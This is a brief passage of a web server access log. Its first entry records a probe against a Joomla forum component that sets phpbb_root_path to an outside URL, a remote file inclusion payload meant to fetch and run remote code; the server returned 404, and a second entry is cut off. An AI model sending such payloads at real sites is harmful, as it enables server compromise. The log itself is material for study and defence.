211.220.193.170 - - [18/Feb/2010:10:43:16 -0800] "GET /logs/access.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:43:21 -0800] "G